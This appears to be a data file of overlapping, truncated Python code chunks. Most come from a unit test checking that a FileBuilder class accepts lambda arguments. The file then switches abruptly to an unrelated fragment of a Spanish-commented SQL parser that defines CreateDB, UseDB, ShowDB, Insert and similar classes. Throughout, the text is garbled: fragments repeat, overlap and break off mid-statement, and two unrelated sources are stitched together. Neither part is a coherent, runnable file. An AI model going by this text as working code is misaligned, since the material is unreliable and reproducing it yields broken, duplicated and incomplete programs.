builder, filename: self._write(filename, 'text')) def _build(self, builder): \"\"\"Build function for ``LambdaTest``.\"\"\" builder.subbuild(", "callable. \"\"\" FileBuilder.build(self._cache_filename, 'lambda_test', self._build) self._check_contents( os.path.join(self._temp_dir, 'Dir1', 'Output1.txt'), 'text') self._check_contents( os.path.join(self._temp_dir, 'Dir1',", "function for ``LambdaTest``.\"\"\" builder.subbuild( 'subbuild', self._subbuild, os.path.join(self._temp_dir, 'Dir1')) builder.subbuild( 'subbuild', lambda builder, dir_:", "for ``LambdaTest``.\"\"\" builder.subbuild( 'subbuild', self._subbuild, os.path.join(self._temp_dir, 'Dir1')) builder.subbuild( 'subbuild', lambda builder, dir_: self._subbuild(builder,", "builder.subbuild( 'subbuild', self._subbuild, os.path.join(self._temp_dir, 'Dir1')) builder.subbuild( 'subbuild', lambda builder, dir_: self._subbuild(builder, dir_), os.path.join(self._temp_dir,", "for ``LambdaTest``.\"\"\" self._write(filename, 'text') def _subbuild(self, builder, dir_): \"\"\"Subbuild function for ``LambdaTest``.\"\"\" builder.build_file(", "self._subbuild, os.path.join(self._temp_dir, 'Dir1')) builder.subbuild( 'subbuild', lambda builder, dir_: self._subbuild(builder, dir_), os.path.join(self._temp_dir, 'Dir2')) def", "FileBuilderTest class LambdaTest(FileBuilderTest): \"\"\"Tests that ``FileBuilder`` methods accept lambda arguments. Tests that ``FileBuilder``", "self.assertEqual([], os.listdir(self._temp_dir)) FileBuilder.build( self._cache_filename, 'lambda_test', lambda builder: self._build(builder)) self._check_contents( os.path.join(self._temp_dir, 'Dir1', 'Output1.txt'), 'text')", "'text') def _subbuild(self, builder, dir_): \"\"\"Subbuild function for ``LambdaTest``.\"\"\" builder.build_file( os.path.join(dir_, 'Output1.txt'), 'build_file',", "methods accept lambda arguments. Test that ``FileBuilder`` methods accept lambdas for arguments that", "'lambda_test', lambda builder: self._build(builder)) self._check_contents( os.path.join(self._temp_dir, 'Dir1', 'Output1.txt'), 'text') self._check_contents( os.path.join(self._temp_dir, 'Dir1', 'Output2.txt'),", "methods accept lambdas for arguments that must be callable. \"\"\" FileBuilder.build(self._cache_filename, 'lambda_test', self._build)", "_subbuild(self, builder, dir_): \"\"\"Subbuild function for ``LambdaTest``.\"\"\" builder.build_file( os.path.join(dir_, 'Output1.txt'), 'build_file', self._build_file) builder.build_file(", "'subbuild', self._subbuild, os.path.join(self._temp_dir, 'Dir1')) builder.subbuild( 'subbuild', lambda builder, dir_: self._subbuild(builder, dir_), os.path.join(self._temp_dir, 'Dir2'))", "self._build_file) builder.build_file( os.path.join(dir_, 'Output2.txt'), 'build_file', lambda builder, filename: self._write(filename, 'text')) def _build(self, builder):", "'Dir2', 'Output1.txt'), 'text') self._check_contents( os.path.join(self._temp_dir, 'Dir2', 'Output2.txt'), 'text') FileBuilder.clean(self._cache_filename, 'lambda_test') self.assertEqual([], os.listdir(self._temp_dir)) FileBuilder.build(", "that ``FileBuilder`` methods accept lambdas for arguments that must be callables. \"\"\" def", "'text')) def _build(self, builder): \"\"\"Build function for ``LambdaTest``.\"\"\" builder.subbuild( 'subbuild', self._subbuild, os.path.join(self._temp_dir, 'Dir1'))", "lambdas for arguments that must be callable. \"\"\" FileBuilder.build(self._cache_filename, 'lambda_test', self._build) self._check_contents( os.path.join(self._temp_dir,", "'lambda_test', self._build) self._check_contents( os.path.join(self._temp_dir, 'Dir1', 'Output1.txt'), 'text') self._check_contents( os.path.join(self._temp_dir, 'Dir1', 'Output2.txt'), 'text') self._check_contents(", "self._write(filename, 'text') def _subbuild(self, builder, dir_): \"\"\"Subbuild function for ``LambdaTest``.\"\"\" builder.build_file( os.path.join(dir_, 'Output1.txt'),", "must be callable. \"\"\" FileBuilder.build(self._cache_filename, 'lambda_test', self._build) self._check_contents( os.path.join(self._temp_dir, 'Dir1', 'Output1.txt'), 'text') self._check_contents(", "accept lambdas for arguments that must be callable. \"\"\" FileBuilder.build(self._cache_filename, 'lambda_test', self._build) self._check_contents(", "builder): \"\"\"Build function for ``LambdaTest``.\"\"\" builder.subbuild( 'subbuild', self._subbuild, os.path.join(self._temp_dir, 'Dir1')) builder.subbuild( 'subbuild', lambda", "builder, filename): \"\"\"Build file function for ``LambdaTest``.\"\"\" self._write(filename, 'text') def _subbuild(self, builder, dir_):", "builder.build_file( os.path.join(dir_, 'Output2.txt'), 'build_file', lambda builder, filename: self._write(filename, 'text')) def _build(self, builder): \"\"\"Build", "dir_), os.path.join(self._temp_dir, 'Dir2')) def test_lambda(self): \"\"\"Test that ``FileBuilder`` methods accept lambda arguments. Test", "os.path.join(self._temp_dir, 'Dir1', 'Output1.txt'), 'text') self._check_contents( os.path.join(self._temp_dir, 'Dir1', 'Output2.txt'), 'text') self._check_contents( os.path.join(self._temp_dir, 'Dir2', 'Output1.txt'),", "'Dir1', 'Output1.txt'), 'text') self._check_contents( os.path.join(self._temp_dir, 'Dir1', 'Output2.txt'), 'text') self._check_contents( os.path.join(self._temp_dir, 'Dir2', 'Output1.txt'), 'text')", "from .file_builder_test import FileBuilderTest class LambdaTest(FileBuilderTest): \"\"\"Tests that ``FileBuilder`` methods accept lambda arguments.", "that ``FileBuilder`` methods accept lambda arguments. Tests that ``FileBuilder`` methods accept lambdas for", "FileBuilder from .file_builder_test import FileBuilderTest class LambdaTest(FileBuilderTest): \"\"\"Tests that ``FileBuilder`` methods accept lambda", "os.listdir(self._temp_dir)) FileBuilder.build( self._cache_filename, 'lambda_test', lambda builder: self._build(builder)) self._check_contents( os.path.join(self._temp_dir, 'Dir1', 'Output1.txt'), 'text') self._check_contents(", "Tests that ``FileBuilder`` methods accept lambdas for arguments that must be callables. \"\"\"", "function for ``LambdaTest``.\"\"\" self._write(filename, 'text') def _subbuild(self, builder, dir_): \"\"\"Subbuild function for ``LambdaTest``.\"\"\"", "import FileBuilder from .file_builder_test import FileBuilderTest class LambdaTest(FileBuilderTest): \"\"\"Tests that ``FileBuilder`` methods accept", "``FileBuilder`` methods accept lambda arguments. Tests that ``FileBuilder`` methods accept lambdas for arguments", "import os from .. import FileBuilder from .file_builder_test import FileBuilderTest class LambdaTest(FileBuilderTest): \"\"\"Tests", "class LambdaTest(FileBuilderTest): \"\"\"Tests that ``FileBuilder`` methods accept lambda arguments. Tests that ``FileBuilder`` methods", "\"\"\" FileBuilder.build(self._cache_filename, 'lambda_test', self._build) self._check_contents( os.path.join(self._temp_dir, 'Dir1', 'Output1.txt'), 'text') self._check_contents( os.path.join(self._temp_dir, 'Dir1', 'Output2.txt'),", "self._subbuild(builder, dir_), os.path.join(self._temp_dir, 'Dir2')) def test_lambda(self): \"\"\"Test that ``FileBuilder`` methods accept lambda arguments.", "self._check_contents( os.path.join(self._temp_dir, 'Dir2', 'Output2.txt'), 'text') FileBuilder.clean(self._cache_filename, 'lambda_test') self.assertEqual([], os.listdir(self._temp_dir)) FileBuilder.build( self._cache_filename, 'lambda_test', lambda", "``LambdaTest``.\"\"\" self._write(filename, 'text') def _subbuild(self, builder, dir_): \"\"\"Subbuild function for ``LambdaTest``.\"\"\" builder.build_file( os.path.join(dir_,", "for arguments that must be callables. \"\"\" def _build_file(self, builder, filename): \"\"\"Build file", "that must be callables. \"\"\" def _build_file(self, builder, filename): \"\"\"Build file function for", "self._check_contents( os.path.join(self._temp_dir, 'Dir2', 'Output1.txt'), 'text') self._check_contents( os.path.join(self._temp_dir, 'Dir2', 'Output2.txt'), 'text') FileBuilder.clean(self._cache_filename, 'lambda_test') self.assertEqual([],", "'Output1.txt'), 'text') self._check_contents( os.path.join(self._temp_dir, 'Dir2', 'Output2.txt'), 'text') FileBuilder.clean(self._cache_filename, 'lambda_test') self.assertEqual([], os.listdir(self._temp_dir)) FileBuilder.build( self._cache_filename,", "_build_file(self, builder, filename): \"\"\"Build file function for ``LambdaTest``.\"\"\" self._write(filename, 'text') def _subbuild(self, builder,", "arguments that must be callable. \"\"\" FileBuilder.build(self._cache_filename, 'lambda_test', self._build) self._check_contents( os.path.join(self._temp_dir, 'Dir1', 'Output1.txt'),", "'text') self._check_contents( os.path.join(self._temp_dir, 'Dir2', 'Output1.txt'), 'text') self._check_contents( os.path.join(self._temp_dir, 'Dir2', 'Output2.txt'), 'text') FileBuilder.clean(self._cache_filename, 'lambda_test')", "os from .. import FileBuilder from .file_builder_test import FileBuilderTest class LambdaTest(FileBuilderTest): \"\"\"Tests that", "for ``LambdaTest``.\"\"\" builder.build_file( os.path.join(dir_, 'Output1.txt'), 'build_file', self._build_file) builder.build_file( os.path.join(dir_, 'Output2.txt'), 'build_file', lambda builder,", "FileBuilder.clean(self._cache_filename, 'lambda_test') self.assertEqual([], os.listdir(self._temp_dir)) FileBuilder.build( self._cache_filename, 'lambda_test', lambda builder: self._build(builder)) self._check_contents( os.path.join(self._temp_dir, 'Dir1',", "\"\"\" def _build_file(self, builder, filename): \"\"\"Build file function for ``LambdaTest``.\"\"\" self._write(filename, 'text') def", "def _build_file(self, builder, filename): \"\"\"Build file function for ``LambdaTest``.\"\"\" self._write(filename, 'text') def _subbuild(self,", "os.path.join(self._temp_dir, 'Dir2', 'Output1.txt'), 'text') self._check_contents( os.path.join(self._temp_dir, 'Dir2', 'Output2.txt'), 'text') FileBuilder.clean(self._cache_filename, 'lambda_test') self.assertEqual([], os.listdir(self._temp_dir))", "``FileBuilder`` methods accept lambda arguments. Test that ``FileBuilder`` methods accept lambdas for arguments", "'text') self._check_contents( os.path.join(self._temp_dir, 'Dir2', 'Output2.txt'), 'text') FileBuilder.clean(self._cache_filename, 'lambda_test') self.assertEqual([], os.listdir(self._temp_dir)) FileBuilder.build( self._cache_filename, 'lambda_test',", "'build_file', self._build_file) builder.build_file( os.path.join(dir_, 'Output2.txt'), 'build_file', lambda builder, filename: self._write(filename, 'text')) def _build(self," ]
[ "__init__(self, id): self.id = id def execute(self): print('Ejecutando Drop') print('id : ' +", "columnas.split(\",\") for i in x: c = i.split(\":\") print('El nombre es -> '", "+ '\\' no existe.') #ls_error.append(new_error) #se agrega el error a la lista return", "# recorro la lista de bases de datos if base.id == self.id: #", "None : print('Inherit : ' + self.inh) class Insert(): def __init__(self, id, vals):", "+ str(self.id)) print('cols : ' + str(self.cols)) print('constrain : ' + str(self.constrain)) print('foreing", "# si no, es error new_error = E.Errores('Semántico.', 'La base de datos \\''", "símbolo, de lo contrario no se hace nada class UseDB(): def __init__(self, id):", "owner, mode): # boolean, boolean, string, string, integer self.replace = replace # si", "si existe, la reemplaza/modifica self.ifnot = ifnot # si existe, no la crea", "self.id: # si sí existe, retorno el id return self.id # si no,", "# si no existe ts_global.agregar_simbolo(nueva_base) # se agrega el nuevo símbolo else: #", "= cond def execute(self): print('Ejecutando Delete') print('id : ' + str(self.id)) class Update():", ": ' + str(self.id)) for val in self.vals: print('value : ' + str(val))", "\"IF NOT EXISTS\", se crea/reemplaza if self.replace: # si viene \"OR REPLACE\" if", "as E #Creación de la tabla de simbolos ts_global = TS.tabla_simbolos() #Creación de", "= conditions def execute(): #Llamar metodo que realizara el select print('ejecutando select') class", "= None class Instruccion(): def __init__(self, tipo, instruccion): self.tipo = tipo self.instruccion =", "print('init') self.id = id self.vals = vals def execute(self): print('Ejecutando Insert') print('id :", "' + str(self.ref)) class CreateDB(): def __init__(self, replace, ifnot, id, owner, mode): #", "if base.id == self.id: # y verifico si existe existe = True #", "cols self.inh = inh def execute(self,ts): print('Ejecutando Creare Table') print('id : ' +", "' + c[1]) #create_column(db, nombre, c[0], c[1], ts) ts.agregar_simbolo(nueva_tabla) return ts def create_column(db,", "nada class UseDB(): def __init__(self, id): # string self.id = id # nombre", "id self.cond = cond def execute(self): print('Ejecutando Delete') print('id : ' + str(self.id))", "cols self.constrain = constrain self.fkey = fkey self.ref = ref def execute(self): print('ejecutando", "\"OR REPLACE\" if not existe: # si no existe la base de datos", "verifico si existe existe = True # si existe, cambio el valor de", "metodo que realizara el select print('ejecutando select') class AlterTable(): def __init__(self, id, cols,", "[] def create_table(db, nombre, columnas, ts): nueva_tabla = TS.Simbolo(nombre, TS.tipo_simbolo.TABLE, None, db, None,", "= order self.conditions = conditions def execute(): #Llamar metodo que realizara el select", "# se concatenan los nombres return respuesta + '\\n' # y los retorna", "None class Instruccion(): def __init__(self, tipo, instruccion): self.tipo = tipo self.instruccion = instruccion", "if len(bases) == 0: # si no hay bases de datos return '\\n\\tNo", "error nuevo_error = E.Errores('Semántico.', 'No pueden venir conjuntamente las cláusulas \\'OR REPLACE\\' e", "bases = ts_global.get_databases() # obtiene todas las bases de datos for base in", "= dist self.selcol = selcol self.fromcol = fromcol self.joins = joins self.order =", "REPLACE\" if existe: # si existe, es un error nuevo_error = E.Errores('Semántico.', 'Ya", "class Select(): def __init__(self, dist, selcol, fromcol, joins, order, conditions): self.dist = dist", "+ self.id + '\\' no existe.') #ls_error.append(new_error) #se agrega el error a la", "retorno el id return self.id # si no, es error new_error = E.Errores('Semántico.',", "str(self.id)) for val in self.vals: print('value : ' + str(val)) class Delete(): def", "def __init__(self, tipo, instruccion): self.tipo = tipo self.instruccion = instruccion class Select(): def", "<filename>parser/team09/instrucciones.py import tabla_simbolos as TS import Errores as E base_actual = None class", "joins, order, conditions): self.dist = dist self.selcol = selcol self.fromcol = fromcol self.joins", "una base de datos con el nombre \\'' + self.id + '\\'.') #ls_error.append(nuevo_error)", "= False # bandera para comprobar si existe bases = ts_global.get_databases() # obtiene", "-> ' + c[1]) #create_column(db, nombre, c[0], c[1], ts) ts.agregar_simbolo(nueva_tabla) return ts def", "+ str(val)) class Delete(): def __init__(self, id, cond): self.id = id self.cond =", "str(val)) class Delete(): def __init__(self, id, cond): self.id = id self.cond = cond", "el nuevo símbolo else: # si sí viene \"IF NOT EXISTS\" if self.replace:", "nueva_base = TS.Simbolo(self.id, TS.tipo_simbolo.DATABASE, None, None, None, None, None, None) existe = False", "def __init__(self, id): self.id = id def execute(self): print('Ejecutando Drop') print('id : '", "+ str(self.id)) for val in self.vals: print('value : ' + str(val)) class Delete():", "class Update(): def __init__(self, id, vals): self.id = id self.vals = vals def", "Insert') print('id : ' + str(self.id)) for val in self.vals: print('value : '", "execute(self): print('Ejecutando Update') print('id : ' + str(id)) ''' import tabla_simbolos as TS", "= fkey self.ref = ref def execute(self): print('ejecutando alter table') print('id : '", "= id, self.base = base self.cols = cols self.inh = inh def execute(self,ts):", "el error a la lista else: # si no existe ts_global.agregar_simbolo(nueva_base) # se", "y los retorna class Drop(): def __init__(self, id): self.id = id def execute(self):", "ts_global): bases = ts_global.get_databases() # obtiene todas las bases de datos for base", "import tabla_simbolos as TS import Errores as E base_actual = None class Instruccion():", "import Errores as E base_actual = None class Instruccion(): def __init__(self, tipo, instruccion):", "str(col.id)) print('col type : ' + str(col.tipo)) if self.inh != None : print('Inherit", "un error nuevo_error = E.Errores('Semántico.', 'Ya existe una base de datos con el", "que realizara el select print('ejecutando select') class AlterTable(): def __init__(self, id, cols, constrain,", "base_actual = None class Instruccion(): def __init__(self, tipo, instruccion): self.tipo = tipo self.instruccion", "elimina, luego ts_global.agregar_simbolo(nueva_base) # se agrega el nuevo símbolo else: # si no", "x: c = i.split(\":\") print('El nombre es -> ' + c[0] + '", "de simbolos ts_global = TS.tabla_simbolos() #Creación de lista de errores ls_error = []", "TS.tipo_simbolo.DATABASE, None, None, None, None, None, None) existe = False # bandera para", "self.dist = dist self.selcol = selcol self.fromcol = fromcol self.joins = joins self.order", "print('cols : ' + str(self.cols)) print('constrain : ' + str(self.constrain)) print('foreing keys :'", "bases: # recorre la lista, respuesta = respuesta + '\\t' + base.id +", "la lista return None # y retorno None class ShowDB(): def __init__(self): print('show')", "hay bases de datos creadas.\\n' # se retorna un mensaje respuesta = '\\n'", "id self.vals = vals def execute(self): print('Ejecutando Update') print('id : ' + str(id))", "existe, no la crea self.id = id # nombre de la base de", "de la comprobación if not self.ifnot: # si no viene \"IF NOT EXISTS\",", "error nuevo_error = E.Errores('Semántico.', 'Ya existe una base de datos con el nombre", "crea/reemplaza if self.replace: # si viene \"OR REPLACE\" if existe: # si existe", "se agrega el nuevo símbolo else: # si no viene \"OR REPLACE\" if", "nueva_tabla = TS.Simbolo(nombre, TS.tipo_simbolo.TABLE, None, db, None, None, None, None) x = columnas.split(\",\")", "crea self.id = id # nombre de la base de datos self.owner =", "respuesta = '\\n' # de lo contrario, for base in bases: # recorre", "base.id == self.id: # si sí existe, retorno el id return self.id #", "__init__(self, tipo, instruccion): self.tipo = tipo self.instruccion = instruccion class Select(): def __init__(self,", "ls_error = [] def create_table(db, nombre, columnas, ts): nueva_tabla = TS.Simbolo(nombre, TS.tipo_simbolo.TABLE, None,", "print('show') def execute(self, ts_global): bases = ts_global.get_databases() # obtiene todas las bases de", "se elimina, luego ts_global.agregar_simbolo(nueva_base) # se agrega el nuevo símbolo else: # si", "self.mode = mode # modo de almacenamiento def execute(self, ts_global): nueva_base = TS.Simbolo(self.id,", "= inh def execute(self,ts): print('Ejecutando Creare Table') print('id : ' + str(self.id)) for", "as E base_actual = None class Instruccion(): def __init__(self, tipo, instruccion): self.tipo =", "return self.id # si no, es error new_error = E.Errores('Semántico.', 'La base de", "0: # si no hay bases de datos return '\\n\\tNo hay bases de", "def execute(self, ts_global): nueva_base = TS.Simbolo(self.id, TS.tipo_simbolo.DATABASE, None, None, None, None, None, None)", "print('id : ' + str(self.id)) class Update(): def __init__(self, id, vals): self.id =", "\\'IF NOT EXISTS\\'.') #ls_error.append(nuevo_error) #se agrega el error a la lista else: #", "Drop') print('id : ' + self.id) class CreateTable(): def __init__(self, id, base, cols,", "comprobar si existe bases = ts_global.get_databases() # obtiene todas las bases de datos", "columnas, ts): nueva_tabla = TS.Simbolo(nombre, TS.tipo_simbolo.TABLE, None, db, None, None, None, None) x", "la tabla de simbolos ts_global = TS.tabla_simbolos() #Creación de lista de errores ls_error", "si sí viene \"IF NOT EXISTS\" if self.replace: # si viene \"OR REPLACE\",", "str(self.cols)) print('constrain : ' + str(self.constrain)) print('foreing keys :' + str(self.fkey)) print('references :", "class ShowDB(): def __init__(self): print('show') def execute(self, ts_global): bases = ts_global.get_databases() # obtiene", "' + str(val)) class Delete(): def __init__(self, id, cond): self.id = id self.cond", "c = i.split(\":\") print('El nombre es -> ' + c[0] + ' y", "#ls_error.append(new_error) #se agrega el error a la lista return None # y retorno", "E #Creación de la tabla de simbolos ts_global = TS.tabla_simbolos() #Creación de lista", "datos ts_global.agregar_simbolo(nueva_base) # se agrega el nuevo símbolo, de lo contrario no se", "= respuesta + '\\t' + base.id + '\\n' # se concatenan los nombres", "= i.split(\":\") print('El nombre es -> ' + c[0] + ' y el", "se hace nada class UseDB(): def __init__(self, id): # string self.id = id", "nuevo_error = E.Errores('Semántico.', 'Ya existe una base de datos con el nombre \\''", "return ts def create_column(db, tabla, columna, tipo, ts): nueva_columna = TS.Simbolo(columna,TS.tipo_simbolo.INTEGER,None,db,0,True,False,None) agregar =", "ts_global): bases = ts_global.get_databases() # obtiene todas las bases de datos if len(bases)", ": print('Inherit : ' + self.inh) class Insert(): def __init__(self, id, vals): print('init')", "base de datos ts_global.agregar_simbolo(nueva_base) # se agrega el nuevo símbolo, de lo contrario", "se concatenan los nombres return respuesta + '\\n' # y los retorna class", "agrega el error a la lista return None # y retorno None class", "ts_global.agregar_simbolo(nueva_base) # se agrega el nuevo símbolo, de lo contrario no se hace", "obtiene todas las bases de datos if len(bases) == 0: # si no", "replace # si existe, la reemplaza/modifica self.ifnot = ifnot # si existe, no", "dist self.selcol = selcol self.fromcol = fromcol self.joins = joins self.order = order", "ref): self.id = id self.cols = cols self.constrain = constrain self.fkey = fkey", "REPLACE\" if existe: # si existe la base de datos ts_global.drop_db(self.id) # se", "la lista else: # si no existe ts_global.agregar_simbolo(nueva_base) # se agrega el nuevo", "instruccion): self.tipo = tipo self.instruccion = instruccion class Select(): def __init__(self, dist, selcol,", "sí existe, retorno el id return self.id # si no, es error new_error", "ts_global): nueva_base = TS.Simbolo(self.id, TS.tipo_simbolo.DATABASE, None, None, None, None, None, None) existe =", "for base in bases: # recorro la lista de bases de datos if", "salgo de la comprobación if not self.ifnot: # si no viene \"IF NOT", "id : ' + str(col.id)) print('col type : ' + str(col.tipo)) if self.inh", "= instruccion class Select(): def __init__(self, dist, selcol, fromcol, joins, order, conditions): self.dist", "self.order = order self.conditions = conditions def execute(): #Llamar metodo que realizara el", "EXISTS\\'.') #ls_error.append(nuevo_error) #se agrega el error a la lista else: # si no", "new_error = E.Errores('Semántico.', 'La base de datos \\'' + self.id + '\\' no", "Update') print('id : ' + str(id)) ''' import tabla_simbolos as TS import Errores", "= id self.vals = vals def execute(self): print('Ejecutando Update') print('id : ' +", "in bases: # recorro la lista de bases de datos if base.id ==", "create_table(db, nombre, columnas, ts): nueva_tabla = TS.Simbolo(nombre, TS.tipo_simbolo.TABLE, None, db, None, None, None,", "for i in x: c = i.split(\":\") print('El nombre es -> ' +", "ts_global.drop_db(self.id) # se elimina, luego ts_global.agregar_simbolo(nueva_base) # se agrega el nuevo símbolo else:", "c[1]) #create_column(db, nombre, c[0], c[1], ts) ts.agregar_simbolo(nueva_tabla) return ts def create_column(db, tabla, columna,", "Creare Table') print('id : ' + str(self.id)) for col in self.cols : print('col", "existe bases = ts_global.get_databases() # obtiene todas las bases de datos for base", "nuevo_error = E.Errores('Semántico.', 'No pueden venir conjuntamente las cláusulas \\'OR REPLACE\\' e \\'IF", "bases: # recorro la lista de bases de datos if base.id == self.id:", "\"OR REPLACE\" if existe: # si existe la base de datos ts_global.drop_db(self.id) #", "existe, es un error nuevo_error = E.Errores('Semántico.', 'Ya existe una base de datos", "# de lo contrario, for base in bases: # recorre la lista, respuesta", "nombre de la base de datos self.owner = owner # nombre/id del creador", "conjuntamente las cláusulas \\'OR REPLACE\\' e \\'IF NOT EXISTS\\'.') #ls_error.append(nuevo_error) #se agrega el", "+ str(self.constrain)) print('foreing keys :' + str(self.fkey)) print('references : ' + str(self.ref)) class", "bases de datos if len(bases) == 0: # si no hay bases de", "else: # si no viene \"OR REPLACE\" if existe: # si existe, es", "print('Ejecutando Insert') print('id : ' + str(self.id)) for val in self.vals: print('value :", "= E.Errores('Semántico.', 'Ya existe una base de datos con el nombre \\'' +", "self.id = id def execute(self): print('Ejecutando Drop') print('id : ' + self.id) class", "# si existe la base de datos ts_global.drop_db(self.id) # se elimina, luego ts_global.agregar_simbolo(nueva_base)", "None, None, None) x = columnas.split(\",\") for i in x: c = i.split(\":\")", "conditions): self.dist = dist self.selcol = selcol self.fromcol = fromcol self.joins = joins", "self.id + '\\'.') #ls_error.append(nuevo_error) #se agrega el error a la lista else: #", "not self.ifnot: # si no viene \"IF NOT EXISTS\", se crea/reemplaza if self.replace:", "la crea self.id = id # nombre de la base de datos self.owner", "bases de datos for base in bases: # verifico si existe: if base.id", "= joins self.order = order self.conditions = conditions def execute(): #Llamar metodo que", "error a la lista return None # y retorno None class ShowDB(): def", "id # nombre de la base de datos def execute(self, ts_global): bases =", "# se retorna un mensaje respuesta = '\\n' # de lo contrario, for", "Table') print('id : ' + str(self.id)) for col in self.cols : print('col id", "if self.inh != None : print('Inherit : ' + self.inh) class Insert(): def", "self.tipo = tipo self.instruccion = instruccion class Select(): def __init__(self, dist, selcol, fromcol,", ": ' + str(self.id)) print('cols : ' + str(self.cols)) print('constrain : ' +", "a la lista else: # si no existe ts_global.agregar_simbolo(nueva_base) # se agrega el", "# si existe, la reemplaza/modifica self.ifnot = ifnot # si existe, no la", "luego ts_global.agregar_simbolo(nueva_base) # se agrega el nuevo símbolo else: # si no viene", "# nombre de la base de datos def execute(self, ts_global): bases = ts_global.get_databases()", "existe, retorno el id return self.id # si no, es error new_error =", "None class ShowDB(): def __init__(self): print('show') def execute(self, ts_global): bases = ts_global.get_databases() #", "valor de la bandera break # y salgo de la comprobación if not", "print('id : ' + self.id) class CreateTable(): def __init__(self, id, base, cols, inh):", "id, vals): self.id = id self.vals = vals def execute(self): print('Ejecutando Update') print('id", "cambio el valor de la bandera break # y salgo de la comprobación", "las cláusulas \\'OR REPLACE\\' e \\'IF NOT EXISTS\\'.') #ls_error.append(nuevo_error) #se agrega el error", "# nombre/id del creador self.mode = mode # modo de almacenamiento def execute(self,", "instruccion class Select(): def __init__(self, dist, selcol, fromcol, joins, order, conditions): self.dist =", "E.Errores('Semántico.', 'No pueden venir conjuntamente las cláusulas \\'OR REPLACE\\' e \\'IF NOT EXISTS\\'.')", "de datos if len(bases) == 0: # si no hay bases de datos", "fromcol self.joins = joins self.order = order self.conditions = conditions def execute(): #Llamar", "símbolo else: # si no viene \"OR REPLACE\" if existe: # si existe,", "cols, inh): self.id = id, self.base = base self.cols = cols self.inh =", "de datos \\'' + self.id + '\\' no existe.') #ls_error.append(new_error) #se agrega el", "+ self.id + '\\'.') #ls_error.append(nuevo_error) #se agrega el error a la lista else:", "\\'OR REPLACE\\' e \\'IF NOT EXISTS\\'.') #ls_error.append(nuevo_error) #se agrega el error a la", "print('Inherit : ' + self.inh) class Insert(): def __init__(self, id, vals): print('init') self.id", "datos ts_global.drop_db(self.id) # se elimina, luego ts_global.agregar_simbolo(nueva_base) # se agrega el nuevo símbolo", ": ' + str(self.id)) class Update(): def __init__(self, id, vals): self.id = id", "print('id : ' + str(id)) ''' import tabla_simbolos as TS import Errores as", "TS.Simbolo(nombre, TS.tipo_simbolo.TABLE, None, db, None, None, None, None) x = columnas.split(\",\") for i", "def create_column(db, tabla, columna, tipo, ts): nueva_columna = TS.Simbolo(columna,TS.tipo_simbolo.INTEGER,None,db,0,True,False,None) agregar = ts.agregar_columna(tabla, db,", "+ str(self.id)) class Update(): def __init__(self, id, vals): self.id = id self.vals =", "import tabla_simbolos as TS import Errores as E #Creación de la tabla de", "order, conditions): self.dist = dist self.selcol = selcol self.fromcol = fromcol self.joins =", "hay bases de datos return '\\n\\tNo hay bases de datos creadas.\\n' # se", "def execute(self): print('Ejecutando Delete') print('id : ' + str(self.id)) class Update(): def __init__(self,", "datos con el nombre \\'' + self.id + '\\'.') #ls_error.append(nuevo_error) #se agrega el", "si no hay bases de datos return '\\n\\tNo hay bases de datos creadas.\\n'", "__init__(self, id, base, cols, inh): self.id = id, self.base = base self.cols =", "True # si existe, cambio el valor de la bandera break # y", "for val in self.vals: print('value : ' + str(val)) class Delete(): def __init__(self,", "tabla, columna, tipo, ts): nueva_columna = TS.Simbolo(columna,TS.tipo_simbolo.INTEGER,None,db,0,True,False,None) agregar = ts.agregar_columna(tabla, db, nueva_columna) '''", "REPLACE\", es error nuevo_error = E.Errores('Semántico.', 'No pueden venir conjuntamente las cláusulas \\'OR", "str(id)) ''' import tabla_simbolos as TS import Errores as E #Creación de la", "table') print('id : ' + str(self.id)) print('cols : ' + str(self.cols)) print('constrain :", "# y retorno None class ShowDB(): def __init__(self): print('show') def execute(self, ts_global): bases", "def __init__(self): print('show') def execute(self, ts_global): bases = ts_global.get_databases() # obtiene todas las", "+ '\\'.') #ls_error.append(nuevo_error) #se agrega el error a la lista else: # si", "las bases de datos if len(bases) == 0: # si no hay bases", ": ' + str(val)) class Delete(): def __init__(self, id, cond): self.id = id", "__init__(self, id, vals): self.id = id self.vals = vals def execute(self): print('Ejecutando Update')", "de datos for base in bases: # recorro la lista de bases de", "string, string, integer self.replace = replace # si existe, la reemplaza/modifica self.ifnot =", "None, None) x = columnas.split(\",\") for i in x: c = i.split(\":\") print('El", "self.id = id self.cond = cond def execute(self): print('Ejecutando Delete') print('id : '", "si existe bases = ts_global.get_databases() # obtiene todas las bases de datos for", "= True # si existe, cambio el valor de la bandera break #", "inh def execute(self,ts): print('Ejecutando Creare Table') print('id : ' + str(self.id)) for col", "def execute(self,ts): print('Ejecutando Creare Table') print('id : ' + str(self.id)) for col in", "no hay bases de datos return '\\n\\tNo hay bases de datos creadas.\\n' #", "if self.replace: # si viene \"OR REPLACE\" if existe: # si existe la", "existe la base de datos ts_global.agregar_simbolo(nueva_base) # se agrega el nuevo símbolo, de", "= ref def execute(self): print('ejecutando alter table') print('id : ' + str(self.id)) print('cols", "self.instruccion = instruccion class Select(): def __init__(self, dist, selcol, fromcol, joins, order, conditions):", "self.id = id self.cols = cols self.constrain = constrain self.fkey = fkey self.ref", "base de datos con el nombre \\'' + self.id + '\\'.') #ls_error.append(nuevo_error) #se", "TS import Errores as E base_actual = None class Instruccion(): def __init__(self, tipo,", "self.inh) class Insert(): def __init__(self, id, vals): print('init') self.id = id self.vals =", ": ' + self.id) class CreateTable(): def __init__(self, id, base, cols, inh): self.id", "lista return None # y retorno None class ShowDB(): def __init__(self): print('show') def", "print('col id : ' + str(col.id)) print('col type : ' + str(col.tipo)) if", "existe existe = True # si existe, cambio el valor de la bandera", "el nuevo símbolo else: # si no viene \"OR REPLACE\" if existe: #", ": ' + str(id)) ''' import tabla_simbolos as TS import Errores as E", "nombre, c[0], c[1], ts) ts.agregar_simbolo(nueva_tabla) return ts def create_column(db, tabla, columna, tipo, ts):", "class AlterTable(): def __init__(self, id, cols, constrain, fkey, ref): self.id = id self.cols", "id, base, cols, inh): self.id = id, self.base = base self.cols = cols", "None, None, None, None) x = columnas.split(\",\") for i in x: c =", ": ' + str(self.cols)) print('constrain : ' + str(self.constrain)) print('foreing keys :' +", "tipo, instruccion): self.tipo = tipo self.instruccion = instruccion class Select(): def __init__(self, dist,", "+ base.id + '\\n' # se concatenan los nombres return respuesta + '\\n'", "'No pueden venir conjuntamente las cláusulas \\'OR REPLACE\\' e \\'IF NOT EXISTS\\'.') #ls_error.append(nuevo_error)", "None, db, None, None, None, None) x = columnas.split(\",\") for i in x:", "= base self.cols = cols self.inh = inh def execute(self,ts): print('Ejecutando Creare Table')", "self.vals: print('value : ' + str(val)) class Delete(): def 